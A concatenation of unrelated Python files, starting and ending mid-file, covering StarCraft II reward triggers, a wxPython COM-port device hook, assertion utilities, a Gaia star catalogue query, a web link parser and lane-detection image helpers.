score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
collected_minerals, collected_vespene, collection_rate_minerals, collection_rate_vespene,
spent_minerals, spent_vespene
]:
if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
event_triggers[env_no][event_idx] = 1
elif event_idx in [idle_production_time, idle_worker_time]:
if current_events[env_no][event_idx] == previous_events[env_no][event_idx]:
event_triggers[env_no][event_idx] = 1
# no production reward if supply blocked
for env_no in range(event_triggers.shape[0]):
if current_events[env_no][food_workers] + current_events[env_no][food_army] == current_events[env_no][food_cap] < 200 and \
current_events[env_no][food_workers] == previous_events[env_no][food_workers] or \
current_events[env_no][food_army] == previous_events[env_no][food_army]:
event_triggers[env_no][idle_production_time] = 0
return event_triggers
def getTriggeredQuantitativeEvents(done, previous_events, current_events):
# # non_spatial_features_idx
# # player non spatial features and indices
# player_id = 0
# minerals = 1
# vespene = 2
# food_used = 3
# food_cap = 4
# food_army = 5
# food_workers = 6
# idle_worker_count = 7
# army_count = 8
# warp_gate_count = 9
# larva_count = 10
# # score cumulative non spatial features and indices
# score = 11
# idle_production_time = 12
# idle_worker_time = 13
# total_value_units = 14
# total_value_structures = 15
# killed_value_units = 16
# killed_value_structures = 17
# collected_minerals = 18
# collected_vespene = 19
# collection_rate_minerals = 20
# collection_rate_vespene = 21
# spent_minerals = 22
# spent_vespene = 23
event_triggers = np.zeros([len(current_events), len(current_events[0])])
if previous_player_layers is None or previous_score_cumulative_layers is None or done[0]:
return event_triggers
for env_no in range(event_triggers.shape[0]):
for event_idx in range(event_triggers.shape[1]):
if event_idx in [
minerals, vespene, food_used,
spent_minerals, spent_vespene
]:
if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
event_triggers[env_no][event_idx] = 1
elif current_events[env_no][event_idx] < previous_events[env_no][event_idx]:
event_triggers[env_no][event_idx] = -1
elif event_idx in [
# minerals, vespene, food_used,
food_cap, food_workers, food_army, army_count,
warp_gate_count, larva_count,
score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
collected_minerals, collected_vespene, collection_rate_minerals, collection_rate_vespene,
# spent_minerals, spent_vespene
]:
if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
previous_events[env_no][event_idx]
elif event_idx in [idle_production_time, idle_worker_time]:
if current_events[env_no][event_idx] == previous_events[env_no][event_idx]:
event_triggers[env_no][event_idx] = 1
# ugly bug fix
if event_idx in [
minerals, vespene, food_used, food_cap, food_workers, food_army, army_count,
warp_gate_count, larva_count,
score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
collected_minerals, collected_vespene, collection_rate_minerals, collection_rate_vespene,
spent_minerals, spent_vespene
]:
if current_events[env_no][event_idx] > previous_events[env_no][event_idx] + 20000:
event_triggers[env_no][event_idx] = 0
# no production reward if supply blocked
for env_no in range(event_triggers.shape[0]):
if current_events[env_no][food_workers] + current_events[env_no][food_army] == current_events[env_no][food_cap] < 200 and \
current_events[env_no][food_workers] == previous_events[env_no][food_workers] and \
current_events[env_no][food_army] == previous_events[env_no][food_army]:
event_triggers[env_no][idle_production_time] = 0
return event_triggers
def getTriggeredGreedyEvents(done, previous_events, current_events, starting_values):
# non_spatial_features_idx
# player non spatial features and indices
player_id = 0
minerals = 1
vespene = 2
food_used = 3
food_cap = 4
food_army = 5
food_workers = 6
idle_worker_count = 7
army_count = 8
warp_gate_count = 9
larva_count = 10
# score cumulative non spatial features and indices
score = 11
idle_production_time = 12
idle_worker_time = 13
total_value_units = 14
total_value_structures = 15
killed_value_units = 16
killed_value_structures = 17
collected_minerals = 18
collected_vespene = 19
collection_rate_minerals = 20
collection_rate_vespene = 21
spent_minerals = 22
spent_vespene = 23
event_triggers = np.zeros([len(current_events), len(current_events[0])])
if previous_player_layers is None or previous_score_cumulative_layers is None or done[0]:
return event_triggers
for env_no in range(event_triggers.shape[0]):
for event_idx in range(event_triggers.shape[1]):
if event_idx in [
minerals, vespene, food_used,
food_cap, food_workers, food_army, army_count,
warp_gate_count, larva_count,
score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
collected_minerals, collected_vespene,
# collection_rate_minerals, collection_rate_vespene,
# spent_minerals, spent_vespene
]:
if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
starting_values[env_no][event_idx]
# else:
# event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
# previous_events[env_no][event_idx]
elif event_idx in [collection_rate_minerals, collection_rate_vespene]:
if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
event_triggers[env_no][event_idx] = current_events[env_no][event_idx]
elif event_idx in [idle_production_time, idle_worker_time]:
if current_events[env_no][event_idx] == previous_events[env_no][event_idx]:
event_triggers[env_no][event_idx] = 1
# ugly bug fix
if event_idx in [
minerals, vespene, food_used, food_cap, food_workers, food_army, army_count,
warp_gate_count, larva_count,
score, total_value_units, total_value_structures, killed_value_units, killed_value_structures,
collected_minerals, collected_vespene, collection_rate_minerals, collection_rate_vespene,
spent_minerals, spent_vespene
]:
if current_events[env_no][event_idx] > previous_events[env_no][event_idx] + 20000:
event_triggers[env_no][event_idx] = 0
# no production reward if supply blocked
for env_no in range(event_triggers.shape[0]):
if current_events[env_no][food_workers] + current_events[env_no][food_army] == current_events[env_no][
food_cap] < 200 and \
current_events[env_no][food_workers] == previous_events[env_no][food_workers] and \
current_events[env_no][food_army] == previous_events[env_no][food_army]:
event_triggers[env_no][idle_production_time] = 0
#
# if event_idx in [score, collected_minerals, collected_vespene,
# collection_rate_minerals, collection_rate_vespene,
# ]:
# # large strictly positive rewards
# # to maximise
# if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
# event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
# starting_values[env_no][event_idx]
#
# elif event_idx in [
# # minerals, vespene,
# spent_minerals, spent_vespene,
# killed_value_units, killed_value_structures]:
# # small rewards
# event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
# previous_events[env_no][event_idx]
#
# elif event_idx in [food_used, food_cap, food_workers, food_army, army_count,
# total_value_units, total_value_structures,
# warp_gate_count, larva_count,
# ]:
# # large positive rewards on gain
# # small negative rewards on loss
# if current_events[env_no][event_idx] > previous_events[env_no][event_idx]:
# event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
# starting_values[env_no][event_idx]
# else:
# event_triggers[env_no][event_idx] = current_events[env_no][event_idx] - \
# previous_events[env_no][event_idx]
return event_triggers |
from misinfo.server_oneoff import server
# if you want to run a batch run
#from misinfo.server_batch import server
server.launch() |
##########################################################################
##
## This is a modification of the original WndProcHookMixin by Kevin Moore,
## modified to use ctypes only instead of pywin32, so it can be used
## with no additional dependencies in Python 2.5
##
##########################################################################
import ctypes
from ctypes import wintypes
import wx
GWL_WNDPROC = -4
WM_DESTROY = 2
DBT_DEVTYP_PORT = 0x00000003 # device Port
DBT_DEVTYP_DEVICEINTERFACE = 0x00000005 # device interface class
DBT_DEVICEREMOVECOMPLETE = 0x8004 # device is gone
DBT_DEVICEARRIVAL = 0x8000 # system detected a new device
WM_DEVICECHANGE = 0x0219
## It's probably not neccesary to make this distinction, but it never hurts to be safe
if 'unicode' in wx.PlatformInfo:
SetWindowLong = ctypes.windll.user32.SetWindowLongW
CallWindowProc = ctypes.windll.user32.CallWindowProcW
else:
SetWindowLong = ctypes.windll.user32.SetWindowLongA
CallWindowProc = ctypes.windll.user32.CallWindowProcA
## Create a type that will be used to cast a python callable to a c callback function
WndProcType = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_int, ctypes.c_uint, ctypes.c_int, ctypes.c_int)
class DEV_BROADCAST_DEVICEINTERFACE(ctypes.Structure):
_fields_ = [("dbcc_size", ctypes.c_ulong),
("dbcc_devicetype", ctypes.c_ulong),
("dbcc_reserved", ctypes.c_ulong),
("dbcc_name", ctypes.c_wchar * 256)]
class DEV_BROADCAST_HDR(ctypes.Structure):
_fields_ = [("dbch_size", wintypes.DWORD),
("dbch_devicetype", wintypes.DWORD),
("dbch_reserved", wintypes.DWORD)]
class WndProcHookMixin:
"""
This class can be mixed in with any wxWindows window class in order to hook it's WndProc function.
You supply a set of message handler functions with the function addMsgHandler. When the window receives that
message, the specified handler function is invoked. If the handler explicitly returns False then the standard
WindowProc will not be invoked with the message. You can really screw things up this way, so be careful.
This is not the correct way to deal with standard windows messages in wxPython (i.e. button click, paint, etc)
use the standard wxWindows method of binding events for that. This is really for capturing custom windows messages
or windows messages that are outside of the wxWindows world.
"""
def __init__(self):
self.__msgDict = {}
## We need to maintain a reference to the WndProcType wrapper
## because ctypes doesn't
self.__localWndProcWrapped = None
self.rtnHandles = []
def hookWndProc(self):
self.__localWndProcWrapped = WndProcType(self.localWndProc)
self.__oldWndProc = SetWindowLong(self.GetHandle(),
GWL_WNDPROC,
self.__localWndProcWrapped)
def unhookWndProc(self):
SetWindowLong(self.GetHandle(),
GWL_WNDPROC,
self.__oldWndProc)
## Allow the ctypes wrapper to be garbage collected
self.__localWndProcWrapped = None
def addMsgHandler(self,messageNumber,handler):
self.__msgDict[messageNumber] = handler
def localWndProc(self, hWnd, msg, wParam, lParam):
# call the handler if one exists
# performance note: has_key is the fastest way to check for a key
# when the key is unlikely to be found
# (which is the case here, since most messages will not have handlers).
# This is called via a ctypes shim for every single windows message
# so dispatch speed is important
if self.__msgDict.has_key(msg):
# if the handler returns false, we terminate the message here
# Note that we don't pass the hwnd or the message along
# Handlers should be really, really careful about returning false here
if self.__msgDict[msg](wParam,lParam) == False:
return
# Restore the old WndProc on Destroy.
if msg == WM_DESTROY: self.unhookWndProc()
return CallWindowProc(self.__oldWndProc,
hWnd, msg, wParam, lParam)
def hookMsgHandler(self,handlerArrival,handlerRemoved):
self.handlerArrival = handlerArrival
self.handlerRemoved = handlerRemoved
self.addMsgHandler(WM_DEVICECHANGE,self.__onDeviceChange)
self.hookWndProc()
def __onDeviceChange(self,wParam,lParam):
if lParam:
dbh = DEV_BROADCAST_HDR.from_address(lParam)
if dbh.dbch_devicetype == DBT_DEVTYP_PORT:
dbd = DEV_BROADCAST_DEVICEINTERFACE.from_address(lParam)
dbcc_name = dbd.dbcc_name
if wParam == DBT_DEVICEARRIVAL:
#print "COM Arrival :",dbcc_name
self.handlerArrival(dbcc_name)
elif wParam == DBT_DEVICEREMOVECOMPLETE:
#print "COM Removed :",dbcc_name
self.handlerRemoved(dbcc_name)
return True
'''
def registerDeviceNotification(self, guid, devicetype=DBT_DEVTYP_DEVICEINTERFACE):
devIF = DEV_BROADCAST_DEVICEINTERFACE()
devIF.dbcc_size = ctypes.sizeof(DEV_BROADCAST_DEVICEINTERFACE)
devIF.dbcc_devicetype = DBT_DEVTYP_DEVICEINTERFACE
if guid:
devIF.dbcc_classguid = comtypes.GUID(guid)
#devIF.dbcc_classguid = GUID.GUID(guid)
return RegisterDeviceNotification(self.GetHandle(), ctypes.byref(devIF), 0)
def unregisterDeviceNotification(self, handle):
if UnregisterDeviceNotification(handle) == 0:
raise Exception("Unable to unregister device notification messages")
'''
# a simple example
if __name__ == "__main__":
import _winreg
class MyPanel(wx.Panel):
def __init__(self,parent):
wx.Panel.__init__(self,parent)
COM_Label = wx.StaticText(self, -1, "COM:")
list = self.__ReadComList()
list.sort(self.sort_COM)
self.ComListBox = wx.Choice(self,choices=list)
self.ComListBox.SetStringSelection(list[0])
Box = wx.BoxSizer(wx.HORIZONTAL) # BoxSizer for Vertical ScrollBar + VSB on panel3
Box.Add(COM_Label,0)
Box.Add(self.ComListBox,0)
self.SetSizer(Box)
parent.hookMsgHandler(self.__onDeviceChange)
def sort_COM(self,COMx,COMy):
x=int(COMx.split("COM")[1])
y=int(COMy.split("COM")[1])
if x>y:
return 1
if x==y:
return 0
if x<y:
return -1
def __ReadComList(self):
key = _winreg.OpenKey( _winreg.HKEY_LOCAL_MACHINE, 'HARDWARE\DEVICEMAP\SERIALCOMM',0, _winreg.KEY_READ)
keyNb = _winreg.QueryInfoKey(key)[1]
port = []
for i in range(keyNb):
port.append(_winreg.EnumValue(key,i)[1])
_winreg.EnumValue(key,9)
return port
def __onDeviceChange(self,wParam,lParam):
#print "WM_DEVICECHANGE [WPARAM:%i][LPARAM:%i]"%(wParam,lParam)
if lParam:
dbh = DEV_BROADCAST_HDR.from_address(lParam)
if dbh.dbch_devicetype == DBT_DEVTYP_PORT:
dbd = DEV_BROADCAST_DEVICEINTERFACE.from_address(lParam)
dbcc_name = dbd.dbcc_name
if wParam == DBT_DEVICEARRIVAL:
print "COM Arrival :",dbcc_name
list = self.ComListBox.GetStrings()+[dbcc_name]
list.sort(self.sort_COM)
sav = self.ComListBox.GetStringSelection()
self.ComListBox.Clear()
for elem in list:
self.ComListBox.Append(elem)
self.ComListBox.SetStringSelection(sav)
elif wParam == DBT_DEVICEREMOVECOMPLETE:
print "COM Removed :",dbcc_name
if dbcc_name == self.ComListBox.GetStringSelection():
self.ComListBox.SetStringSelection(self.ComListBox.GetStrings()[0])
self.ComListBox.Delete(self.ComListBox.FindString(dbcc_name))
return True
class MyFrame(wx.Frame,WndProcHookMixin):
def __init__(self,parent):
WndProcHookMixin.__init__(self)
wx.Frame.__init__(self,parent,-1,"Insert and Remove USE Device and Watch STDOUT",size=(640,480))
panel = MyPanel(self)
#self.Bind(wx.EVT_CLOSE, self.onClose)
'''
def onClose(self, event):
self.unregisterDeviceNotification(self.devNotifyHandle)
event.Skip()
'''
app = wx.App(False)
frame = MyFrame(None)
frame.Show()
app.MainLoop()
|
import os
import logging
class AssertConditionConstants:
languages = ["eng", "kor"]
available_models = ["transformer", "bert", "poly-encoder", "gpt2"]
available_optimizers = ["adam", "adam_w"]
preprocess_approaches = ["stop", "ignore", "truncate"]
aggregation_methods = ["first", "last", "sum", "average"]
decoding_methods = ["greedy", "beam_search", "top_k_sampling"]
metrics = ["bleu", "meteor", "rouge", "hits", "semantic_score"]
class Assertion:
def assert_isinstance_list(self, data, parameter_name):
assert_message = "The data type of parameter '{parameter}' must be list".format(parameter=parameter_name)
if not isinstance(data, list):
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_isinstance_dict(self, data, parameter_name):
assert_message = "The data type of parameter '{parameter}' must be dict".format(parameter=parameter_name)
if not isinstance(data, dict):
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_isintance(self, obj, data_type):
assert_message = "The data type of parameter 'obj' must be {data_type}".format(data_type=data_type.__name__)
if not isinstance(obj, data_type):
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_isequal_dict(self, a, b):
assert_message = "Given two dictionaries must be equal: {a} vs {b}".format(a=a, b=b)
if a != b:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_isequal_elements_length(self, data):
assert_message = "All elements of data must have equal length: {data_length} vs {element_length}"
length = len(data[0])
for element in data:
if len(element) != length:
assert_message = assert_message.format(data_length=length, element_length=len(element))
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_contain_elements(self, required, target, name=None):
assert_message = "Data must contain following element: {element}"
if name is not None: assert_message = "{name} must contain following element: '{{element}}'".format(name=name)
for element in required:
if element not in target:
assert_message = assert_message.format(element=element)
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_isequal_keys(self, a, b, except_keys=None):
a_keys = set(a.keys())
b_keys = set(b.keys())
if except_keys is not None:
a_keys = a_keys.difference(set(except_keys))
b_keys = b_keys.difference(set(except_keys))
assert_message = "The keys of two dictionaries must be equal: {a_keys} vs {b_keys}".format(a_keys=a_keys, b_keys=b_keys)
if a_keys != b_keys:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_implemented(self, method_name):
assert_message = "{method_name} method must be implemented".format(method_name=method_name)
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_equal(self, a, b):
assert_message = "Given inputs must be equal: {a} vs {b}".format(a=a, b=b)
if a != b:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_equal_length(self, a, b):
assert_message = "The length of given inputs must be equal: {len1} vs {len2}".format(len1=len(a), len2=len(b))
if len(a) != len(b):
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_equal_or_greater(self, value, criteria):
assert_message = "Given value must be equal or greater than {criteria}".format(criteria=criteria)
if value < criteria:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_equal_or_lesser(self, value, criteria):
assert_message = "Given value must be equal or lesser than {criteria}".format(criteria=criteria)
if value > criteria:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_greater_length(self, data, length):
assert_message = "The length of given data must be greater than {length}".format(length=length)
if len(data) <= length:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_lesser_length(self, data, length):
assert_message = "The length of given data must be lesser than {length}".format(length=length)
if len(data) >= length:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_is_not_none(self, obj, name=None):
assert_message = "Object must not be None"
if name is not None: assert_message = "'{name}' must not be None".format(name=name)
if obj is None:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_not_out_of_index(self, index, upperbound):
assert_message = "Index must be less than length {upperbound}".format(upperbound=upperbound)
if index >= upperbound:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_isin_obj(self, element, obj):
assert_message = "Element must be one of elements of obj: {given} is not in {obj}".format(given=element, obj=obj)
if element not in obj:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_proper_extension(self, path, extensions):
assert_message = "Path must ends with '{extension}': {path}".format(extension=extensions, path=path)
flag = False
for extension in extensions:
if path.endswith(extension):
flag = True
break
if not flag:
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_is_valid_file(self, path):
assert_message = "Invalid or File not exists: {path}".format(path=path)
if not os.path.exists(path) and not os.path.isfile(path):
logging.error(assert_message)
raise AssertionError(assert_message)
def assert_is_valid_path(self, path):
assert_message = "Invalid or Path not exists: {path}".format(path=path)
if not os.path.exists(path) and not os.path.isdir(path):
logging.error(assert_message)
raise AssertionError(assert_message) |
#
# Copyright (c), 2016-2020, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""Package protection limits. Values can be changed after import to set different limits."""
MAX_XML_DEPTH = 9999
"""
Maximum depth of XML data. An `XMLSchemaValidationError` is raised if this limit is exceeded.
"""
MAX_MODEL_DEPTH = 15
"""
Maximum XSD model group depth. An `XMLSchemaModelDepthError` is raised if this limit is exceeded.
"""
|
from typing import List
class Solution:
def numberOfSubarrays(self, nums: List[int], k: int) -> int:
hashmap = {}
s = 0
hashmap[s] = 1
res = 0
for i in range(len(nums)):
if nums[i] & 1 == 1:
s += 1
if s - k >= 0:
res += hashmap[s - k]
if s not in hashmap.keys():
hashmap[s] = 1
else:
hashmap[s] += 1
return res |
import astropy.units as u
import astropy.coordinates as coord
from astroquery.gaia import Gaia
from astropy.io import ascii
import numpy as np
import pandas as pd
import math
import struct
from functools import partial
import sys
import os
from os import listdir
import warnings
warnings.filterwarnings("ignore")
pd.set_option("display.max_rows", None, "display.max_columns", None)
maxSelection = '100'
columns = 'source_id, ra, dec, pmra, pmdec, parallax, teff_val, radius_val, designation'
minParallax = '0.02'
maxParallax = '0.03'
parallaxOverError = '10'
coordinateFile = 'coordinates100.bin'
parsedValuesFile = 'parsedValues100000.bin'
parsecPerSlice = 2600
queryBase = """SELECT TOP {maxSelection}
{columns}
FROM gaiadr2.gaia_source
WHERE parallax_over_error > 10 AND
parallax > {minParallax} AND
parallax < 1000"""# AND"""
#teff_val IS NOT null
#"""
queryBase3 = """SELECT TOP {maxSelection}
{columns}
FROM gaiadr2.gaia_source
WHERE (parallax BETWEEN {minParallax} AND {maxParallax}) AND
parallax_over_error > {parallaxOverError} AND
(gaiadr2.gaia_source.radius_val>=2.0)"""# AND"""
#teff_val IS NOT null
#"""
queryBase2 = """SELECT TOP {maxSelection} {columns}
FROM gaiadr2.gaia_source
WHERE
CONTAINS(
POINT('ICRS',gaiadr2.gaia_source.ra,gaiadr2.gaia_source.dec),
CIRCLE('ICRS',266.4051,-28.936175,5)
)=1 AND (gaiadr2.gaia_source.parallax>={minParallax})"""#AND teff_val IS NOT null
#"""
queryBase4 = """SELECT *
FROM gaiadr2.gaia_source AS G, gaiadr2.vari_cepheid AS V WHERE G.source_id=V.source_id AND
parallax > 0
"""
queryBase5 = """
SELECT TOP {maxSelection}
{columns}
FROM gaiadr2.gaia_source
WHERE (gaiadr2.gaia_source.radius_val>=2.0)
"""
queryBase6 = """
SELECT {columns}
FROM gaiadr2.gaia_source
WHERE (gaiadr2.gaia_source.random_index<=1000000 AND gaiadr2.gaia_source.parallax BETWEEN 0.0384615384615385 AND 1000 AND teff_val > 0.1)
"""
maxX = 0
maxY = 0
maxZ = 0
maxValue = 0
queriedStars = 0
def getTableMeta():
meta = Gaia.load_table('gaiadr2.gaia_source')
print(meta)
for column in (meta.columns):
print(column.name)
def synchronousQuery():
query1 = """SELECT
TOP 10
source_id, ref_epoch, ra, dec, parallax
FROM gaiadr2.gaia_source"""
job1 = Gaia.launch_job(query1)
print(job1)
results1 = job1.get_results()
results1.pprint_all()
def asyncQuery():
query2 = """SELECT TOP 3000
source_id, ref_epoch, ra, dec, parallax
FROM gaiadr2.gaia_source
WHERE parallax < 1
"""
job2 = Gaia.launch_job_async(query2)
print(job2)
results2 = job2.get_results()
results2.pprint_all()
Gaia.remove_jobs([job2.jobid])
def appendToFile(f, x, y, z, temper, distance, radius, source_id):
s = struct.pack('fffiffq', x, y, z, temper, distance, radius, source_id)
f.write(s)
def handleResults(f, results2):
count = 0
temper = results2["teff_val"]
print("Min K: {0} - Max K: {1}".format(min(temper),max(temper)))
dist = coord.Distance(parallax=u.Quantity(results2["parallax"]))
print("Min Parallax: {0} - Max Parallax: {1}".format(min(dist),max(dist)))
print(len(results2))
for row in results2:
dist = coord.Distance(parallax=u.Quantity(row["parallax"] * u.mas))
c = coord.SkyCoord(ra=row["ra"] * u.deg,
dec=row["dec"] * u.deg,
distance=dist)
c = c.cartesian
radius = float(row["radius_val"])
if math.isnan(radius):
radius = float(0)
source_id = np.longlong(row["source_id"])
print (c.x.value / 26000.0)
print (c.y.value/ 26000.0)
print (c.z.value/ 26000.0)
x = np.single(c.x.value)
y = np.single(c.y.value)
z = np.single(c.z.value)
global maxX
global maxY
global maxZ
if abs(x) > maxX:
maxX = abs(x)
if abs(y) > maxY:
maxY = abs(y)
if abs(z) > maxZ:
maxZ = abs(z)
temper = math.floor(row["teff_val"])
appendToFile(f, x, y, z, temper, float(dist.value), radius, source_id)
count = count+1
sys.stdout.write("\rFortschritt: " + str(count) + "/" + str(maxSelection))
global maxValue
global queriedStars
queriedStars = queriedStars + count
maxValue = max(maxX, maxY, maxZ)
def parseValues(maxValue):
f = open(parsedValuesFile, 'wb')
f.close()
f = open(parsedValuesFile, 'ab')
print(maxValue)
global queriedStars
count = 0
s = struct.pack('i', np.int32(queriedStars))
f.write(s)
print(coordinateFile)
with open(coordinateFile, 'rb') as openfileobject:
chunk = openfileobject.read(32)
while chunk:
unpackedStruct = struct.unpack('fffiffq',chunk)
parsedX = np.single(unpackedStruct[0] / maxValue)
parsedY = np.single(unpackedStruct[1] / maxValue)
parsedZ = np.single(unpackedStruct[2] / maxValue)
appendToFile(f, parsedX, parsedY, parsedZ, unpackedStruct[3], unpackedStruct[4], unpackedStruct[5],unpackedStruct[6])
count = count+1
sys.stdout.write("\rFortschritt: " + str(count) + "/" + str(maxSelection))
chunk = openfileobject.read(32)
f.close()
def main():
#maxSelection = input("How many stars would you like to query? ")
query6 = queryBase6.format(columns=columns)
job2 = Gaia.launch_job_async(query6)
results2 = job2.get_results()
global maxSelection
maxSelection = str(len(results2) + 1)
print(maxSelection)
global coordinateFile
global parsedValuesFile
coordinateFile = ("coordinates" + maxSelection + ".bin")
parsedValuesFile = ("parsedValues" + maxSelection + ".bin")
#Resets coordinateFile to an empty file
f = open(coordinateFile, 'wb')
f.close()
f = open(coordinateFile, 'ab')
c = coord.SkyCoord(ra= 266.4051 * u.deg,
dec= -28.93175 * u.deg,
distance= 8122 * u.pc)
c = c.cartesian
x = np.single(c.x.value)
y = np.single(c.y.value)
z = np.single(c.z.value)
temper = 1
global maxX
global maxY
global maxZ
if abs(x) > maxX:
maxX = abs(x)
if abs(y) > maxY:
maxY = abs(y)
if abs(z) > maxZ:
maxZ = abs(z)
appendToFile(f, x, y, z, temper, 8122, 1, np.longlong(1))
global queriedStars
queriedStars = queriedStars + 1
handleResults(f, results2)
f.close()
filename = 'gdr2_testResults.txt'
results2.write(filename, format='ascii',overwrite=True)
print("")
Gaia.remove_jobs([job2.jobid])
print("Starting to parse values")
parseValues(maxValue)
print("")
print("Parsed Values")
if __name__ == '__main__':
main() |
"""
PARSER
--------------------
Class responsible for parsing the desired site
"""
from bs4 import BeautifulSoup
import requests
from urlparse import urlsplit
import utilities
class BookParser(object):
def __init__(self, url, selector, tag_name):
self.url = url
self.selector = utilities.class_or_id(selector)
self.tag_name = tag_name
self.soup = self.get_soup()
def get_soup(self):
"""
Retrieve HTML soup from given URL
"""
r = requests.get(self.url)
data = r.text
soup = BeautifulSoup(data)
return soup
def get_links(self):
"""
Get 'table of contents page' and retrieve list of pages to send to Readability.com
"""
url_list = []
# choose selector
if self.selector[0] == 'id':
divs = self.soup.find_all(id=self.selector[1])
elif self.selector[0] == 'class':
divs = self.soup.find_all(class_=self.selector[1], limit=1)
else:
divs = self.soup.find_all('body', limit=1)
# then retrieve all links:
for div in divs:
for link in div.find_all('a'):
href = str(link.get('href'))
# ignore empty links, anchors, and mailto:
if href != '' and href[0] != '#' and 'None' not in href and 'mailto:' not in href:
href = self.sanitize_url(link.get('href'))
url_list.append(href)
print 'Found %s links (Selector: %s).' % (len(url_list), self.selector)
without_duplicates = utilities.remove_duplicate_urls(url_list)
print 'Removing duplicates, the list was reduced to %s links.' % len(without_duplicates)
return without_duplicates
def sanitize_url(self, current_url):
"""
Here we have to account for internal links, so if there's no netloc,
prepend the current (given) URL
SplitResult(scheme='http', netloc='', path=u'abc.html', query='', fragment=u'')
"""
# TODO extend this to https and make it more error tolerant
# absolute urls, starting with / should be handled too
current_url_parts = urlsplit(current_url)
if 'http' in current_url:
sanitized_url = 'http://' + current_url_parts.netloc + current_url_parts.path
else:
url_parts = urlsplit(self.url)
sanitized_url = 'http://' + url_parts.netloc + url_parts.path + current_url_parts.path
return sanitized_url
def get_tag_name(self):
"""
If a name was specified in the command line options, use it as the tag name
for Readability. Otherwise, default back to the html <title> of the defined page
"""
if self.tag_name == "":
return str(self.soup.head.title.contents[0])
else:
return self.tag_name
|
import numpy as np
import cv2
import matplotlib.pyplot as plt
import pickle
import scipy
from scipy import signal
from collections import deque
def loadDistMatrix():
# load distortion matrix
with open('camera_dist_pickle.p', mode='rb') as f:
dist_pickle = pickle.load(f)
mtx = dist_pickle["mtx"]
dist = dist_pickle["dist"]
return mtx, dist
def region_of_interest(img):
"""
Applies an image mask.
Only keeps the region of the image defined by the polygon
formed from `vertices`. The rest of the image is set to black.
"""
shape = img.shape
vertices = np.array([[(0,0),(shape[1],0),(shape[1],0),(6*shape[1]/7,shape[0]),
(shape[1]/7,shape[0]), (0,0)]],dtype=np.int32)
mask = np.zeros_like(img)
#defining a 3 channel or 1 channel color to fill the mask with depending on the input image
if len(img.shape) > 2:
channel_count = img.shape[2] # i.e. 3 or 4 depending on your image
ignore_mask_color = (255,) * channel_count
else:
ignore_mask_color = 255
#filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, ignore_mask_color)
#returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image
def undistort(img, mtx, dist):
result = cv2.undistort(img, mtx, dist, None, mtx)
return result
def binarize(img, s_thresh=(120, 255), sx_thresh=(20, 255),l_thresh=(40,255)):
img = np.copy(img)
# Convert RGB to HLS color space
hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype(np.float)
#h_channel = hls[:,:,0]
l_channel = hls[:,:,1]
s_channel = hls[:,:,2]
# Sobel x
# sobelx = abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255))
# l_channel_col=np.dstack((l_channel,l_channel, l_channel))
sobelx = cv2.Sobel(l_channel, cv2.CV_64F, 1, 0) # Take the derivative in x
abs_sobelx = np.absolute(sobelx) # Absolute x derivative to accentuate lines away from horizontal
scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx))
# Threshold x gradient
sxbinary = np.zeros_like(scaled_sobel)
sxbinary[(scaled_sobel >= sx_thresh[0]) & (scaled_sobel <= sx_thresh[1])] = 1
# Threshold saturation channel
s_binary = np.zeros_like(s_channel)
s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1
# Threshold lightness
l_binary = np.zeros_like(l_channel)
l_binary[(l_channel >= l_thresh[0]) & (l_channel <= l_thresh[1])] = 1
channels = 255*np.dstack(( l_binary, sxbinary, s_binary)).astype('uint8')
binary = np.zeros_like(sxbinary)
binary[((l_binary == 1) & (s_binary == 1) | (sxbinary==1))] = 1
binary = 255*np.dstack((binary,binary,binary)).astype('uint8')
return binary,channels
def warp(img,tobird=True):
corners = np.float32([[190,720],[589,457],[698,457],[1145,720]])
new_top_left=np.array([corners[0,0],0])
new_top_right=np.array([corners[3,0],0])
offset=[150,0]
img_size = (img.shape[1], img.shape[0])
src = np.float32([corners[0],corners[1],corners[2],corners[3]])
dst = np.float32([corners[0]+offset,new_top_left+offset,new_top_right-offset ,corners[3]-offset])
if tobird:
M = cv2.getPerspectiveTransform(src, dst)
else:
M = cv2.getPerspectiveTransform(dst,src)
